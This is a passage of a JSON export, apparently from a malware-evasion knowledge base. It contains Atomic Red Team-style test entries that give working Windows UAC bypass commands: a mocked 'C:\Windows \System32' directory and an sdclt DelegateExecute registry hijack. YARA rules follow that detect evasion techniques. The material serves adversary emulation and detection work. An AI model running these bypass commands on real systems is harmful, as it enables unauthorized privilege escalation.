-Recurse -ErrorAction Ignore\r\n    name: powershell\r\n    elevation_required: true\r\n- name: Bypass UAC by Mocking Trusted Directories\r\n  auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1\r\n  description: |\r\n    Creates a fake \"trusted directory\" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems\r\n    Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      mkdir \"\\\\?\\C:\\Windows \\System32\\\"\r\n      copy \"#{executable_binary}\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n      mklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n    cleanup_command: |\r\n      rd \"\\\\?\\C:\\Windows \\\" /S /Q >nul 2>nul\r\n      del \"c:\\testbypass.exe\" >nul 2>nul\r\n    name: command_prompt\r\n    elevation_required: true\r\n- name: Bypass UAC using sdclt DelegateExecute\r\n  auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7\r\n  description: |\r\n    Bypasses User Account Control using a fileless method, registry only. 
\r\n    Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\r\n    [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\r\n    Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    command.to.execute:\r\n      description: Command to execute\r\n      type: string\r\n      default: cmd.exe /c notepad.exe\r\n  executor:\r\n    command: |\r\n      New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value '#{command.to.execute}'\r\n      New-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\r\n      Start-Process -FilePath $env:windir\\system32\\sdclt.exe\r\n      Start-Sleep -s 3\r\n    cleanup_command: |\r\n      Remove-Item -Path \"HKCU:\\Software\\Classes\\Folder\" -Recurse -Force -ErrorAction Ignore\r\n    name: powershell"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_Check_installed_software",
            "rule": "import \"pe\"\r\n\r\nrule check_installed_software {\r\n    meta:\r\n        description = \"Detect check installed software through registry\"\r\n        author = \"Thomas Roccia | @fr0gger_\"\r\n    strings:\r\n        $s1 = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\" wide\r\n\r\n    condition:\r\n       uint16(0) == 0x5A4D and $s1 or\r\n       pe.imports(\"Advapi32.dll\", \"RegQueryValueEx\")\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_Detect_Possible_GetForegroundWindow_Evasion",
            "rule": "import \"pe\"\r\n \r\nrule UNPROTECT_Possible_GetForegroundWindow_Evasion\r\n{\r\n    meta:\r\n        description = \"Attempts to detect possible usage of sandbox evasion techniques using GetForegroundWindow API, based on module imports.\"\r\n        author = \"Kyle Cucci\"\r\n        date = \"2020-09-30\"\r\n \r\n    condition:\r\n        uint16(0) == 0x5A4D and\r\n        pe.imports(\"user32.dll\", \"GetForegroundWindow\") and\r\n        pe.imports(\"kernel32.dll\", \"Sleep\")\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_disable_process",
            "rule": "import \"pe\"\r\n\r\nrule UNPROTECT_disable_process\r\n{\r\n    meta:\r\n\tauthor = \"Thomas Roccia | @fr0gger_\"\r\n\tdescription = \"Disable blacklisted processes\"\r\n\r\n    strings:\r\n        $api1 = \"CreateToolhelp32Snapshot\" nocase\r\n        $api2 = \"Process32First\" nocase\r\n        $api3 = \"Process32Next\" nocase\r\n\r\n        $p1 = \"taskkill.exe\" nocase\r\n        $p2 = \"tskill.exe\" nocase\r\n\r\ncondition:\r\n        uint32(uint32(0x3C)) == 0x4550 and 3 of ($api*) or any of ($p*) \r\n}"
        }
    ]
}